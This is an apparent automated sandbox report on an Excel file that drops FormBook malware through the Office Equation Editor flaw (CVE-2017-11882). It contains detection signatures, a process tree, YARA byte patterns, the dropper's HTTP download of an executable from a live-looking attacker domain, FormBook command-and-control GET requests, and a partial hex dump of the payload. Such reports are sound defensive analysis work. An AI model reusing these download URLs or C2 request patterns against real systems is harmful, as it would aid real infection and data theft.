
Analysis Report PI202009255687.xlsx

Overview

General Information

Sample Name: PI202009255687.xlsx
Analysis ID: 323042
MD5: d7c0c12c1cdf36e9f97f96cb3fe16ae0
SHA1: e73e8bd48f5ef68747de444e44d59745cb75b08a
SHA256: 76b2d9b4655b8a349e1b5c7bf05ac5bb22bea988bc818e46756b17d7e22a37d1
Tags: Formbook, VelvetSweatshop, xlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2248 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2736 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2816 cmdline: 'C:\Users\Public\vbc.exe' MD5: E54D832CB872B7DC086AB7A7878D38FB)
      • vbc.exe (PID: 2484 cmdline: C:\Users\Public\vbc.exe MD5: E54D832CB872B7DC086AB7A7878D38FB)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wscript.exe (PID: 268 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 979D74799EA6C8B8167869A68DF5204A)
            • cmd.exe (PID: 2228 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.vbc.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.vbc.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.vbc.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
6.2.vbc.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
6.2.vbc.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2736, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.141.138.87, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2736, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2736, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
Sigma detected: Executables Started in Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2736, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
Sigma detected: Execution in Non-Executable Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2736, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816
Sigma detected: Suspicious Program Location Process Starts
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2736, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2816

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu | Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: PI202009255687.xlsx | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe | Joe Sandbox ML: detected
Source: 6.2.vbc.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then pop edi
Source: global traffic | DNS query: name: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49168
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 08:00:28 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 25 Nov 2020 21:20:21 GMTETag: "61800-5b4f4feb1ea84"Accept-Ranges: bytesContent-Length: 399360Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea aa c2 b4 ae cb ac e7 ae cb ac e7 ae cb ac e7 b0 99 28 e7 b4 cb ac e7 b0 99 39 e7 be cb ac e7 89 0d d7 e7 bf cb ac e7 ae cb ad e7 d8 cb ac e7 b0 99 2f e7 e7 cb ac e7 b0 99 38 e7 af cb ac e7 b0 99 3d e7 af cb ac e7 52 69 63 68 ae cb ac e7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 89 ca be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 2a 01 00 00 f6 04 00 00 00 00 00 97 35 00 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 06 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 61 01 00 b4 00 00 00 00 a0 04 00 a8 89 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 d0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 5c 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 29 01 00 00 10 00 00 00 2a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bc 2b 00 00 00 40 01 00 00 2c 00 00 00 2e 
01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 28 03 00 00 70 01 00 00 1e 03 00 00 5a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 89 01 00 00 a0 04 00 00 8a 01 00 00 78 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c2 14 00 00 00 30 06 00 00 16 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected: GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1 | Host: www.lygosfilms.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1 | Host: www.paletciniz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1 | Host: www.annaothomas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 160.153.138.53
Source: Joe Sandbox View | ASN Name: GODADDY-AMSDE
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: global traffic | HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420BD973.emf
Source: global traffic | HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1 | Host: www.lygosfilms.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1 | Host: www.paletciniz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1 | Host: www.annaothomas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Type: text/html; charset=UTF-8X-Cacheable: YES:ForcedTransfer-Encoding: chunkedDate: Thu, 26 Nov 2020 08:01:45 GMTAge: 0Connection: closeVary: User-AgentX-Cache: uncachedX-Cache-Hit: MISSX-Backend: all_requestsData Raw: 30 30 37 65 38 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 
3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 2f 31 36 30 2e 31 35 33 2e 31 33 38 2e 35 33 2f 6f 76 7a 2e 64 30 33 2e 6d 79 66 74 70 75 70 6c 6f 61 64 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 6
Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmp | String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
